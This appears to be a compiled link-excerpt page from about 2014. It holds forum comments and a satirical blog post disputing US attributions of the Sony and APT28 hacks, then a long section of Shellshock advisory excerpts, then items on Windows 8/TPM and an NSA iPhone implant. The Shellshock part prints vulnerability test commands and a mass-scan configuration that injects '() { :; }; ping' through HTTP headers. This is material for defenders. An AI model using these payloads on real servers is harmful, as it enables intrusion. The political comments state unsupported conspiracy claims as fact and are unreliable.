That a person has now be identified with the insider knowledge and possibly motive for the hack and without any connection to North Korea makes the Obama administration's claim of North Korean "guilt" even less reliable.
It now seems likely that Obama, to start a conflict with North Korea, just lied about the "evidence" like the Bush administration lied about "Saddam's WMD". The NYT editors were, in both cases, childishly gullible or complicit in the crime.
Puppet Master | Dec 24, 2014 3:43:16 AM | 1
It follows the pattern. In 2002, when the U.S. broke the Geneva agreement which froze the North Korean nuclear program, the US accused North Korea of secretly engaging in uranium enrichment.
It turned out that the intelligence the US had about it was less than certain.
http://www.nytimes.com/2007/03/01/washington/01korea.html?pagewanted=print&_r=0
March 1, 2007
U.S. Had Doubts on North Korean Uranium DriveThe public revelation of the intelligence agencies’ doubts, which have been brewing for some time, came almost by happenstance. In a little-noticed exchange on Tuesday at a hearing at the Senate Armed Services Committee, Joseph DeTrani, a longtime intelligence official, told Senator Jack Reed of Rhode Island that “we still have confidence that the program is in existence — at the mid-confidence level.” Under the intelligence agencies’ own definitions, that level “means the information is interpreted in various ways, we have alternative views” or it is not fully corroborated.
Too late. North Korea already did her first nuclear weapon test in 2006.
All the lies and ploy are to force North Korea into developing Nuclear weapon, and it was exactly what necons wanted.
http://www.washingtonpost.com/wp-dyn/content/article/2006/10/21/AR2006102100296.html
At many points, the United States found itself at odds with other partners in the six-party process, such as China and South Korea, which repeatedly urged the Bush administration to show more flexibility in its tactics. Meanwhile, administration officials were often divided on North Korea policy, with some wanting to engage the country and others wanting to isolate it.Before North Korea announced it had detonated a nuclear device, some senior officials even said they were quietly rooting for a test, believing that would finally clarify the debate within the administration.
Why do they do that?
Not about North Korea, but to catch China.North Korea is just a trap the US has been carefully preparing for a long time to catch China, by maintaining a crisis spot on Chinese border, and keeping South Korea and Japan in the US orbit and away from China.
For the US, North Korea plays the same geopolitical role as Ukraine. As Ukraine is a geopolitical wedge between Russia and Europe, North Korea is the geopolitical wedge between China and Japan.
One good thing now is that their ploy is becoming more transparent and unraveling more quickly.
P Walker | Dec 24, 2014 10:16:59 AM | 8
The whole purpose of the demonization in the MSM of North Korea is to justify the Asian pivot, which is actually about containment of China. The establishment believes it best to not tell the "useful idiots" in the general population so they're using North Korea so as to "protect" the clueless public.
Chip Nihk | Dec 24, 2014 6:34:03 PM | 10
nomas | Dec 24, 2014 7:36:18 PM | 11It goes a little deeper.
P2Asia promised 60:40% realignment to Pacific Theater, from current 40;60%, but (in writing) without Atlantic Theater reduction in forces. No base closures. No redeployments. Pure Mil.Gov Stage 5 Metastasis, from 40:60% to 90:60% as it were, the greatest expansion since to Cold War, and Ukraine:Syria was just an Atlanticist chess move to ensure this will be massive. The only thing the US produces today is bad cars, and military and financial weapons of mass destruction. The Cheneyites will ensure the P2Asia $100sBs all get looted away on IDIQNB contracts. The Gang of Eight 40,000,000 'Blue Visa' Immigration Service Class Bill actually stated in the legislation 'No Bid', together with a New Federal Secret Police, and Rendition SuperMax Prisons in evert State. Together with McHealthcare, McEducatiin, McWar and McPrisons
Obama along with the rest of the U.S. executive and State apparatus, are , by all the evidence, pathological liars
nomas | Dec 24, 2014 7:46:28 PM | 14
@ anon @ 4"Cui bono? Who benefits from framing North Korea?"
The same people who will benefit or who did benefit from framing Serbia, Russia, Syria, Iran, or Libya ? Just a guess.
[Nov 02, 2014] Russian Hackers Are Fiendishly Smart. Good Thing For America They’re So Stupid
Talleyrand used to say "A married man with a family will do anything for money". This is especially true about some security company employees...
Oct 29, 2014 | http://marknesop.wordpress.com
Anyway, before we range too far afield to find our way back, let’s look at the Wall Street Journal article. Just keep in the back of your mind that the “experts” who say the trail leads straight back to the Russian government might well be a couple of college dropouts who spend the rest of their time playing World Of Warcraft.
Security wizards FireEye, a cybersecurity firm based in California, discovered “a sophisticated cyberweapon, able to evade detection and hop between computers walled off from the Internet” in a U.S. system. This brilliant piece of sleuthware, we further learn, “was programmed on Russian-language machines and built during working hours in Moscow.”
Stupid, stupid Russians. They went to all the trouble to bore and stroke that baby until it was humming with super-secret code power, and then pointed a trail right back to the Rodina by writing their code in Cyrillic. And, moreover, betrayed themselves even more convincingly by writing all this code during working hours in Moscow. Or Aman, Jordan, which shares the same time. Or Baghdad. Or Damascus, or Dar es Salaam. Djibouti. Nairobi. Simferopol. Or perhaps the code was written by somebody outside working hours. Is there some evidence that compelled investigators to think the work of writing spy code has to be done between the hours of 9:00 AM and 5:00 PM?
Their confidential report is due to be released Tuesday, so I guess we’ll have to wait to find out. Oh, wait – no, we won’t, because they told the Wall Street Journal (the world’s biggest fucking blabbermouths), and they posted a link to it. They’re calling this mysterious group “APT-28″. Because “Dirty Moskali Masterminded By Putin”, while it looked great on the cover, cost more to print – and we all have to think about costs these days – and sort of lacked the techno-wallop they were looking for.
I don’t want to spoil the report for you, because it is a ripping read, but I have to say up front that a lot of the circumstantial evidence which causes FireEye to blame this snooping on Russia is summed up in an assessment by one of their managers – a former Russia analyst for the U.S. Department of Defense, by a wonderful coincidence: ” “Who else benefits from this? It just looks so much like something that comes from Russia that we can’t avoid the conclusion.”
I see. Well, by God, that is evidence, no denying that. It just looks like Russia. Probably because they were stupid enough to code in Cyrillic, even though almost everyone codes in English regardless where they’re from because almost all programming languages are in English, because most popular frameworks and third-party extension are written in English, because Cyrillic characters are not allowed when naming many functions and variables, and….gee, I’m sure there was something else….oh, yeah: and because using Cyrillic would be a dead giveaway that the source was Russian, and it would be indescribably stupid to write a brilliant code that it would take a top-notch security hired gun to find, and then leave the root code in Cyrillic. The article is at pains to imply the Russians are the world’s most clever hackers. Sure hope they don’t find out how stupid it is to write their code in Russian, or they might really start achieving some success.
But this sneaky program was written during working hours in Moscow, and the information it sought to exploit would only be of interest to the Russian government; that’s how FireEye broke the whole thing wide open, and they’ve been onto the Russians for seven years, ever since they prefaced their invasion of Georgia with a cyber-attack on Georgia’s systems, and ultimately made Saakashvili eat his tie.
Hey, I can think of somebody else who is interested in as much information as it can get on U.S. governmental inner workings, policymaking and current financial situation. Israel. And what do you know? Jerusalem is only an hour off of Moscow time. I’m not suggesting it must have been Israel instead of Russia – perish the thought. But I hope I have adequately expressed my contempt for the doughheaded theory that it must have been Moscow because sneaky writers of dirty code adhere to regular office hours. Just sayin’.
Incidentally, the United States Foreign Agent Registration Act (FARA) has never been enforced against Israel, and in 2012 an amendment was introduced which (paraphrased) reads “The Attorney General may, by regulation, provide for the exemption..[if the AG] determines that such registration…is not necessary…”
After all, Israel has a long and colourful history of spying on the United States. In the early 80’s the FBI investigated AIPAC for long-running espionage and theft of government documents relating to the United States – Israel Free Trade Pact: because Israel had a purloined copy of the USA’s negotiating positions, the story goes, the USA was unable to exploit anything to its advantage because the Israelis already knew what the Americans would concede under pressure: “A quarter-century after the tainted negotiations led to passage of the US-Israel preferential trade pact, it remains the most unfavourable of all U.S. bilateral trade agreements, producing chronic deficits, lack of U.S. market access to Israel and ongoing theft of U.S. intellectual property.“
Defense department stuff? Sure, they were interested in that, too. In 2005 Larry Franklin, Steven Rosen and Keith Weissman were indicted in Virginia for passing classified documents to a foreign power (Israel, although they danced around who it was by referring to it as simply “a Middle Eastern Country”) which were tremendously useful to Israel in its attempts to maneuver the USA into war with Iran on its behalf. Franklin plead guilty and received a 12-year prison sentence which was later – incredibly – reduced to 100 hours of community service and 10 months in a halfway house. All charges against Rosen and Weissman, lobbyists for AIPAC, were dropped in 2009. The United States government claimed it did not want classified material revealed at trial. So dangerous, not to put too fine a point on it, that it was better to let the criminals who had given that classified information to a foreign power go free without punishment than to risk Americans learning it who had no need to know.
Nor was that the only instance. Johnathan Pollard, an analyst with U.S. Naval Intelligence Command, was convicted of spying for Israel and sentenced to life imprisonment. That sentence has waffled back and forth, largely due to intense efforts by agencies of the Israeli government to get it commuted, and currently stands at release just about a year from now. Israel acknowledged that Pollard had spied for that country on its ally in a formal apology, and the Victim Impact Statement hints that the information which was passed endangered both American lives and the USA’s relations with its Arab allies. Details were never made public, and remain classified. However, as the referenced article points out, Israel today enjoys real-time intelligence sharing with the USA, so I guess spying on America is not really all that important after all – what’s FireEye ki-yiing about?
U.S. Navy submariner Ariel Weinmann was arrested and detained as a spy for Israel in 2006 when he reportedly deserted from his unit (USS ALBUQUERQUE) taking with him a laptop computer which held classified information. He was believed to have met with an agent of a foreign power in Vienna and in Mexico City. Initial reports said that power was Israel. Later, after the allies had time to get their heads together and agree on a cover story, Time Magazine broke a story which put it out there, with no substantiation whatsoever, that the foreign power implicated had actually been – wait for it – Russia. He probably had just become confused because Jerusalem and Moscow have almost the same working hours. Weinmann is apparently not Jewish, by the way, the name is of German extraction, or so his father says. He was alleged, by his father, to have been upset because of the USA collecting intelligence information on its allies. So, if you’re still following the storyline, Weinmann – after a naval deployment to the Persian Gulf where the Navy upset him by collecting intelligence information on its allies – stole a laptop containing classified information which presumably proved his case, and disclosed that information to…Russia. Uh huh. A nation which is not only not an ally of the United States – pretty damned far from it, in fact – but one which has no serious naval profile in the Persian Gulf. I feel kind of like I’m running on a giant pretzel.
More recently, in May of this year, Newsweek announced despairingly that Israel will not stop spying on the USA, and the USA will not make them stop. In this article, which accuses Israel of constantly maneuvering to steal American technology and industrial secrets, Israel’s espionage activities are described as “unrivaled and unseemly”. Comically, Israeli Embassy spokesman Aaron Sagui retorted angrily, “Israel doesn’t conduct espionage operations in the United States, period. We condemn the fact that such outrageous, false allegations are being directed against Israel.” No word on whether his nose immediately grew so rapidly that it put the reporter’s eye out, because Israel has already admitted to and apologized for espionage activities in the United States before.
Which brings us back to FireEye, speaking of Pinocchio. FireEye, frankly, needs a big break. Its stock is sinking as other Threat Detection commercial security companies muscle in on the market, and in May was down 65% from a 52-week high, while investors were getting impatient to see some success.
A success like this one, in fact.
Let’s go back a minute to the giddy summary by the FireEye executive cited earlier. “Who else benefits from this? It just looks so much like something that comes from Russia that we can’t avoid the conclusion.”
You know why the conclusion is unavoidable? Because the malicious code is specifically engineered to point in that direction. Who would do that? Russians who meant it to be undetectable?
You tell me.
[Oct 03, 2014] Everything you need to know about the Shellshock Bash bug
September 25, 2014 | troyhunt.com
Remember Heartbleed? If you believe the hype today, Shellshock is in that league and with an equally awesome name albeit bereft of a cool logo (someone in the marketing department of these vulns needs to get on that). But in all seriousness, it does have the potential to be a biggie and as I did with Heartbleed, I wanted to put together something definitive both for me to get to grips with the situation and for others to dissect the hype from the true underlying risk.To set the scene, let me share some content from Robert Graham’s blog post who has been doing some excellent analysis on this. Imagine an HTTP request like this:
target = 0.0.0.0/0 port = 80 banners = true http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html) http-header = Cookie:() { :; }; ping -c 3 209.126.230.74 http-header = Host:() { :; }; ping -c 3 209.126.230.74 http-header = Referer:() { :; }; ping -c 3 209.126.230.74Which, when issued against a range of vulnerable IP addresses, results in this:
[Oct 03, 2014] Shellshock (software bug)
en.wikipedia.org
Analysis of the source code history of Bash shows that the vulnerabilities had existed undiscovered since approximately version 1.13 in 1992.[4] The maintainers of the Bash source code have difficulty pinpointing the time of introduction due to the lack of comprehensive [1]
In Unix-based operating systems, and in other operating systems that Bash supports, each running program has its own list of name/value pairs called environment variables. When one program starts another program, it provides an initial list of environment variables for the new program.[14] Separately from these, Bash also maintains an internal list of functions, which are named scripts that can be executed from within the program.[15] Since Bash operates both as a command interpreter and as a command, it is possible to execute Bash from within itself. When this happens, the original instance can export environment variables and function definitions into the new instance.[16] Function definitions are exported by encoding them within the environment variable list as variables whose values begin with parentheses ("()") followed by a function definition. The new instance of Bash, upon starting, scans its environment variable list for values in this format and converts them back into internal functions. It performs this conversion by creating a fragment of code from the value and executing it, thereby creating the function "on-the-fly", but affected versions do not verify that the fragment is a valid function definition.[17] Therefore, given the opportunity to execute Bash with a chosen value in its environment variable list, an attacker can execute arbitrary commands or exploit other bugs that may exist in Bash's command interpreter.
The name "shellshock" is attributed[by whom?][not in citation given] to Andreas Lindh from a tweet on 24 September 2014.non-primary source needed]
On October 1st, Zalewski released details of the final bugs, and confirmed that Florian's patch does indeed prevent them. Zalewski says fixed
CGI-based web server attack
When a web server uses the Common Gateway Interface (CGI) to handle a document request, it passes various details of the request to a handler program in the environment variable list. For example, the variable HTTP_USER_AGENT has a value that, in normal usage, identifies the program sending the request. If the request handler is a Bash script, or if it executes one for example using the system(3) call, Bash will receive the environment variables passed by the server and will process them as described above. This provides a means for an attacker to trigger the Shellshock vulnerability with a specially crafted server request.[4] The security documentation for the widely used Apache web server states: "CGI scripts can ... be extremely dangerous if they are not carefully checked."[20] and other methods of handling web server requests are often used. There are a number of online services which attempt to test the vulnerability against web servers exposed to the Internet.[citation needed]
SSH server example
OpenSSH has a "ForceCommand" feature, where a fixed command is executed when the user logs in, instead of just running an unrestricted command shell. The fixed command is executed even if the user specified that another command should be run; in that case the original command is put into the environment variable "SSH_ORIGINAL_COMMAND". When the forced command is run in a Bash shell (if the user's shell is set to Bash), the Bash shell will parse the SSH_ORIGINAL_COMMAND environment variable on start-up, and run the commands embedded in it. The user has used their restricted shell access to gain unrestricted shell access, using the Shellshock bug.[21]
DHCP example
Some DHCP clients can also pass commands to Bash; a vulnerable system could be attacked when connecting to an open Wi-Fi network. A DHCP client typically requests and gets an IP address from a DHCP server, but it can also be provided a series of additional options. A malicious DHCP server could provide, in one of these options, a string crafted to execute code on a vulnerable workstation or laptop.[9]
Note of offline system vulnerability
The bug can potentially affect machines that are not directly connected to the Internet when performing offline processing, which involves the use of Bash.[citation needed]
Initial report (CVE-2014-6271)
This original form of the vulnerability involves a specially crafted environment variable containing an exported function definition, followed by arbitrary commands. Bash incorrectly executes the trailing commands when it imports the function.[22] The vulnerability can be tested with the following command:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"In systems affected by the vulnerability, the above commands will display the word "vulnerable" as a result of Bash executing the command "echo vulnerable", which was embedded into the specially crafted environment variable named "x".[24]
There was an initial report of the bug made to the maintainers of Bash (Report# CVE-2014-6271). The bug was corrected with a patch to the program. However, after the release of the patch there were subsequent reports of different, yet related vulnerabilities. On 26 September 2014, two open-source contributors, David A. Wheeler and Norihiro Tanaka, noted that there were additional issues, even after patching systems using the most recently available patches. In an email addressed to the oss-sec list and the bash bug list, Wheeler wrote: "This patch just continues the 'whack-a-mole' job of fixing parsing errors that began with the first patch. Bash's parser is certain [to] have many many many other vulnerabilities".[25]
On 27 September 2014, Michal Zalewski announced his discovery of several other Bash vulnerabilities,[26] one based upon the fact that Bash is typically compiled without [27] Zalewski also strongly encouraged all concerned to immediately apply a patch made available by Florian Weimer.[27]CVE-2014-6277
CVE-2014-6277 relates to the parsing of function definitions in environment variables by Bash. It was discovered by Michał Zalewski.[29]
This causes a segfault.
() { x() { _; }; x() { _; } <<a; }
CVE-2014-6278
CVE-2014-6278 relates to the parsing of function definitions in environment variables by Bash. It was discovered by Michał Zalewski.[29]
() { _; } >_[$($())] { echo hi mom; id; }
CVE-2014-7169
On the same day the bug was published, Tavis Ormandy discovered a related bug which was assigned the CVE identifier CVE-2014-7169.[21] Official and distributed patches for this began releasing on 26 September 2014.[citation needed] Demonstrated in the following code:
env X='() { (a)=>\' sh -c "echo date"; cat echo
which would trigger a bug in Bash to execute the command "date" unintentionally. This would become CVE-2014-7169.[21]
- Testing example
Here is an example of a system that has a patch for CVE-2014-6271 but not CVE-2014-7169:
$ X='() { (a)=>\' bash -c "echo date" bash: X: line 1: syntax error near unexpected token `=' bash: X: line 1: `' bash: error importing function definition for `X' $ cat echo Fri Sep 26 01:37:16 UTC 2014The patched system displays the same error, notifying the user that CVE-2014-6271 has been prevented. However, the attack causes the writing of a file named 'echo', into the working directory, containing the result of the 'date' call. The existence of this issue resulted in the creation of CVE-2014-7169 and the release patches for several systems.
A system patched for both CVE-2014-6271 and CVE-2014-7169 will simply echo the word "date" and the file "echo" will not be created.
$ X='() { (a)=>\' bash -c "echo date" date $ cat echo cat: echo: No such file or directoryCVE-2014-7186
CVE-2014-7186 relates to an out-of-bounds memory access error in the Bash parser code.[31] While working on patching Shellshock, Red Hat researcher Florian Weimer found this bug.[23]
- Testing example
Here is an example of the vulnerability, which leverages the use of multiple "<<EOF" declarations:
bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"
- A vulnerable system will echo the text "CVE-2014-7186 vulnerable, redir_stack".
CVE-2014-7187
CVE-2014-7187 relates to an off-by-one error, allowing out-of-bounds memory access, in the Bash parser code.[32] While working on patching Shellshock, Red Hat researcher Florian Weimer found this bug.[23]
- Testing example
Here is an example of the vulnerability, which leverages the use of multiple "done" declarations:
(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"
- A vulnerable system will echo the text "CVE-2014-7187 vulnerable, word_lineno".
Frequently Asked Questions about the Shellshock Bash flaws
Sep 26, 2014 | securityblog.redhat.com
Why are there four CVE assignments?
The original flaw in Bash was assigned CVE-2014-6271. Shortly after that issue went public a researcher found a similar flaw that wasn’t blocked by the first fix and this was assigned CVE-2014-7169. Later, Red Hat Product Security researcher Florian Weimer found additional problems and they were assigned CVE-2014-7186 and CVE-2014-7187. It’s possible that other issues will be found in the future and assigned a CVE designator even if they are blocked by the existing patches.
... ... ...
Why is Red Hat using a different patch then others?
Our patch addresses the CVE-2014-7169 issue in a much better way than the upstream patch, we wanted to make sure the issue was properly dealt with.
I have deployed web application filters to block CVE-2014-6271. Are these filters also effective against the subsequent flaws?If configured properly and applied to all relevant places, the “() {” signature will work against these additional flaws.
Does SELinux help protect against this flaw?
SELinux can help reduce the impact of some of the exploits for this issue. SELinux guru Dan Walsh has written about this in depth in his blog.
Are you aware of any new ways to exploit this issue?
Within a few hours of the first issue being public (CVE-2014-6271), various exploits were seen live, they attacked the services we identified at risk in our first post:
- from dhclient,
- CGI serving web servers,
- sshd+ForceCommand configuration,
- git repositories.
We did not see any exploits which were targeted at servers which had the first issue fixed, but were affected by the second issue. We are currently not aware of any exploits which target bash packages which have both CVE patches applied.
Why wasn’t this flaw noticed sooner?
The flaws in Bash were in a quite obscure feature that was rarely used; it is not surprising that this code had not been given much attention. When the first flaw was discovered it was reported responsibly to vendors who worked over a period of under 2 weeks to address the issue.
This entry was posted in Vulnerabilities and tagged bash, CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, shellshocked by Huzaifa Sidhpurwala. Bookmark the permalink.
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
>Update 2014-09-25 16:00 UTC
Red Hat is aware that the patch for CVE-2014-6271 is incomplete. An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions. The new issue has been assigned CVE-2014-7169.We are working on patches in conjunction with the upstream developers as a critical priority. For details on a workaround, please see the knowledgebase article.
Red Hat advises customers to upgrade to the version of Bash which contains the fix for CVE-2014-6271 and not wait for the patch which fixes CVE-2014-7169. CVE-2014-7169 is a less severe issue and patches for it are being worked on.
Bash or the Bourne again shell, is a UNIX like shell, which is perhaps one of the most installed utilities on any Linux system. From its creation in 1980, Bash has evolved from a simple terminal based command interpreter to many other fancy uses.
In Linux, environment variables provide a way to influence the behavior of software on the system. They typically consists of a name which has a value assigned to it. The same is true of the Bash shell. It is common for a lot of programs to run Bash shell in the background. It is often used to provide a shell to a remote user (via ssh, telnet, for example), provide a parser for CGI scripts (Apache, etc) or even provide limited command execution support (git, etc)
Coming back to the topic, the vulnerability arises from the fact that you can create environment variables with specially-crafted values before calling the Bash shell. These variables can contain code, which gets executed as soon as the shell is invoked. The name of these crafted variables does not matter, only their contents. As a result, this vulnerability is exposed in many contexts, for example:
- ForceCommand is used in sshd configs to provide limited command execution capabilities for remote users. This flaw can be used to bypass that and provide arbitrary command execution. Some Git and Subversion deployments use such restricted shells. Regular use of OpenSSH is not affected because users already have shell access.
- Apache server using mod_cgi or mod_cgid are affected if CGI scripts are either written in Bash, or spawn subshells. Such subshells are implicitly used by system/popen in C, by os.system/os.popen in Python, system/exec in PHP (when run in CGI mode), and open/system in Perl if a shell is used (which depends on the command string).
- PHP scripts executed with mod_php are not affected even if they spawn subshells.
- DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server. This would allow arbitrary commands to be run, typically as root, on the DHCP client machine.
- Various daemons and SUID/privileged programs may execute shell scripts with environment variable values set / influenced by the user, which would allow for arbitrary commands to be run.
- Any other application which is hooked onto a shell or runs a shell script as using Bash as the interpreter. Shell scripts which do not export variables are not vulnerable to this issue, even if they process untrusted content and store it in (unexported) shell variables and open subshells.
Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these Bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the enivronment variable). Something like:
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" vulnerable this is a testThe patch used to fix this flaw, ensures that no code is allowed after the end of a Bash function. So if you run the above example with the patched version of Bash, you should get an output similar to:
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" bash: warning: x: ignoring function definition attempt bash: error importing function definition for `x' this is a testWe believe this should not affect any backward compatibility. This would, of course, affect any scripts which try to use environment variables created in the way as described above, but doing so should be considered a bad programming practice.
Red Hat has issued security advisories that fixes this issue for Red Hat Enterprise Linux. Fedora has also shipped packages that fixes this issue.
We have additional information regarding specific Red Hat products affected by this issue that can be found at https://access.redhat.com/site/solutions/1207723
Information on CentOS can be found at http://lists.centos.org/pipermail/centos/2014-September/146099.html.
[Sep 29, 2014] Shellshock: How to protect your Unix, Linux and Mac servers By Steven J. Vaughan-Nichols
Fortunately, all the major Linux vendors quickly issued patches, including Debian, Ubuntu, Suse and Red Hat.
zdnet.com
The only thing you have to fear with Shellshock, the Unix/Linux Bash security hole, is fear itself. Yes, Shellshock can serve as a highway for worms and malware to hit your Unix, Linux, and Mac servers, but you can defend against it.
The real and present danger is for servers. According to the National Institute of Standards (NIST), Shellshock scores a perfect 10 for potential impact and exploitability. Red Hat reports that the most common attack vectors are:
- httpd (Your Web server): CGI [Common-Gateway Interface] scripts are likely affected by this issue: when a CGI script is run by the web server, it uses environment variables to pass data to the script. These environment variables can be controlled by the attacker. If the CGI script calls Bash, the script could execute arbitrary code as the httpd user. mod_php, mod_perl, and mod_python do not use environment variables and we believe they are not affected.
- Secure Shell (SSH): It is not uncommon to restrict remote commands that a user can run via SSH, such as rsync or git. In these instances, this issue can be used to execute any command, not just the restricted command.
- dhclient: The Dynamic Host Configuration Protocol Client (dhclient) is used to automatically obtain network configuration information via DHCP. This client uses various environment variables and runs Bash to configure the network interface. Connecting to a malicious DHCP server could allow an attacker to run arbitrary code on the client machine.
- CUPS (Linux, Unix and Mac OS X's print server): It is believed that CUPS is affected by this issue. Various user-supplied values are stored in environment variables when cups filters are executed.
- sudo: Commands run via sudo are not affected by this issue. Sudo specifically looks for environment variables that are also functions. It could still be possible for the running command to set an environment variable that could cause a Bash child process to execute arbitrary code.
- Firefox: We do not believe Firefox can be forced to set an environment variable in a manner that would allow Bash to run arbitrary commands. It is still advisable to upgrade Bash as it is common to install various plug-ins and extensions that could allow this behavior.
- Postfix: The Postfix [mail] server will replace various characters with a ?. While the Postfix server does call Bash in a variety of ways, we do not believe an arbitrary environment variable can be set by the server. It is however possible that a filter could set environment variables.
So much for Red Hat's thoughts. Of these, the Web servers and SSH are the ones that worry me the most. The DHCP client is also troublesome, especially if, as it the case with small businesses, your external router doubles as your Internet gateway and DHCP server.
Of these, Web server attacks seem to be the most common by far. As Florian Weimer, a Red Hat security engineer, wrote: "HTTP requests to CGI scripts have been identified as the major attack vector." Attacks are being made against systems running both Linux and Mac OS X.
Jaime Blasco, labs director at AlienVault, a security management services company, ran a honeypot looking for attackers and found "several machines trying to exploit the Bash vulnerability. The majority of them are only probing to check if systems are vulnerable. On the other hand, we found two worms that are actively exploiting the vulnerability and installing a piece of malware on the system."
Other security researchers have found that the malware is the usual sort. They typically try to plant distributed denial of service (DDoS) IRC bots and attempt to guess system logins and passwords using a list of poor passwords such as 'root', 'admin', 'user', 'login', and '123456.'
So, how do you know if your servers can be attacked? First, you need to check to see if you're running a vulnerable version of Bash. To do that, run the following command from a Bash shell:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
If you get the result:
vulnerable this is a test
Bad news, your version of Bash can be hacked. If you see:
bash: warning: x: ignoring function definition attempt bash: error importing function definition for `x' this is a test
You're good. Well, to be more exact, you're as protected as you can be at the moment.
http://support.novell.com/security/cve/CVE-2014-6271.html
Updated information on the bash fixes.
Sep 26, 2014 | support.novell.com
We have fixed the critical issue CVE-2014-6271 (http://support.novell.com/security/cve/CVE-2014-6271.html) with updates for all supported and LTSS code streams.
SLES 10 SP3 LTSS, SP4 LTSS, SLES 11 SP1 LTSS, SLES 11 SP2 LTSS, SLES 11 SP3, openSUSE 12.3, 13.1.
The issue CVE-2014-7169 ( http://support.novell.com/security/cve/CVE-2014-7169.html) is less severe (no trivial code execution) but will also receive fixes for above. As more patches are under discussions around the bash parser, we will wait some days to collect them to avoid a third bash update.
[Jan 08, 2014] German Government CONFIRMS Key Entities Not To Use Windows 8 with TPM 2.0, Fearing Control by ‘Third Parties’ (Such As NSA) by Wolf Richter
08/26/2013 | www.testosteronepit.com
I expected the German Federal Office for Security in Information Technology (BSI) to contact me in an icily polite but firm manner and make me recant, and I almost expected some goons to show up with an offer I couldn’t refuse, and I half expected Microsoft to shut down my computers remotely and wipe out all my data and make me, as the Japanese say, cry into my pillow for weeks, or something. But none of that happened.
Instead, the BSI officially confirmed on its website the key statements in what has become my most popular article ever. On my humble site alone, it was read over 44,000 times so far, received over 2,090 Facebook “likes,” and was tweeted over 530 times. Here it is: LEAKED: German Government Warns Key Entities Not To Use Windows 8 – Links The NSA.
Internal documents from the BSI that were leaked to Die Zeit described how Windows 8 in conjunction with the new Trusted Platform Module (TPM 2.0) – “a special surveillance chip,” it has been called – allowed Microsoft to control computers remotely through a built-in backdoor without possibility for the user to opt in or opt out. The goal is Digital Rights Management and computer security. Through remote access via this backdoor, Microsoft determines what software is allowed to run on the computer, and what software, such as illegal copies or viruses and Trojans, should be disabled. Keys to that backdoor are likely accessible to the NSA – and in an ironic twist, perhaps even to the Chinese.
Users of Windows 8 with TPM 2.0 (the standard configuration and not an option) surrender control over their machine the moment they turn it on. For that reason, according to the leaked documents, experts at the BSI warned the German Federal Administration and other key users against deploying computers with Windows 8 and TPM 2.0.
The BSI could have brushed off these leaked documents as fakes or rumors, or whatnot. But instead, in response to “media reports,” it decided to clarify a few points on its website, and in doing so, confirmed the key elements. Here are the salient points:
For specific user groups, the use of Windows 8 in combination with TPM may well mean an increase in security. This includes users who, for various reasons, cannot or do not want to take care of the security of their system, but trust that the manufacturer of the system provides and maintains a secure solution. This is a valid user scenario, but the manufacturer should provide sufficient transparency about the potential limitations of the architecture and possible consequences of its use.
From the perspective of the BSI, the use of Windows 8 in combination with TPM 2.0 is accompanied by a loss of control over the operating system and the hardware. This results in new risks for the user, specifically for the Federal Administration and critical infrastructure.
It explains how “unintentional errors” could cause hardware and software to become permanently useless, which “would not be acceptable” for the Federal Administration or for other users. “In addition, the newly established mechanisms can also be used for sabotage by third parties.”
Among them: the NSA and possibly the Chinese.
The BSI considers complete control over the information technology – including a conscious opt-in and later the possibility of an opt-out – a fundamental condition for a responsible use of hardware and operating system.
Since these conditions have not been met, the BSI has warned the “Federal Administration and critical infrastructure users” not to use the Windows 8 with TPM 2.0. The BSI said that it remained in contact with the Trusted Computing Group as well as with makers of operating systems and hardware “in order to find appropriate solutions” (whole text in German).
This alleged connection between Windows and the NSA isn’t new. Geeks have for years tried to document how Microsoft has been cooperating with the NSA and other members of the US Intelligence Community in designing its operating systems. For example, rumors bubbled up in 2007 that computers with Vista, at the time Microsoft’s latest and greatest (and much despised) operating system, automatically established a connection to, among others, the Department of Defense Information Center and Halliburton Company, back then the Darth Vader of Corporate America.
The Windows 8 debacle comes on top of the breathless flow of Edward Snowden’s revelations and paint a much more detailed picture of how the NSA’s spying activities are dependent on Corporate America. These revelations are already slamming tech companies [my take: US Tech Companies Raked Over The Coals In China ] as they find it harder to sell their allegedly compromised products overseas. Which foreign government or corporation would now want to use Windows 8 with TPM 2.0?
Or is this – and the entire hullabaloo about the Snowden revelations – just another item in the governmental and corporate category of “This Too Shall Pass?” The answer lies in this paragraph:
No laws define the limits of the NSA’s power. No Congressional committee subjects the agency’s budget to a systematic, informed and skeptical review. With unknown billions of Federal dollars, the agency purchases the most sophisticated communications and computer equipment in the world. But truly to comprehend the growing reach of this formidable organization, it is necessary to recall once again how the computers that power the NSA are also gradually changing lives of Americans....
The year? Not 2013. But thirty years ago.
It was published by the New York Times in 1983, adapted from David Burnham’s book, The Rise of the Computer State [brought to my attention by @mark_white0]. And we’re still going down the same road. Only now, we’re a lot further along. No wonder that tech companies, government agencies, and Congress alike think that this too shall pass. Because it has always done so before.
So, here is my offending article: LEAKED: German Government Warns Key Entities Not To Use Windows 8 – Links The NSA.
Author webpage: www.amazon.com/author/wolfrichter
[Jan 08, 2014] Apple Says It Is ‘Unaware’ of N.S.A. iPhone Hack Program By NICOLE PERLROTH
"It can also turn the iPhone into a “hot mic” using the phone’s own microphone as a recording device and capture images via the iPhone’s camera. (Reminder to readers: Masking tape is not a bad idea)."
Dec 31, 2013 | NYT
The agency described DROPOUTJEEP as a “software implant for Apple iPhone” that has all kinds of handy spy capabilities. DROPOUTJEEP can pull or push information onto the iPhone, snag SMS text messages, contact lists, voicemail and a person’s geolocation, both from the phone itself and from cell towers in close proximity.
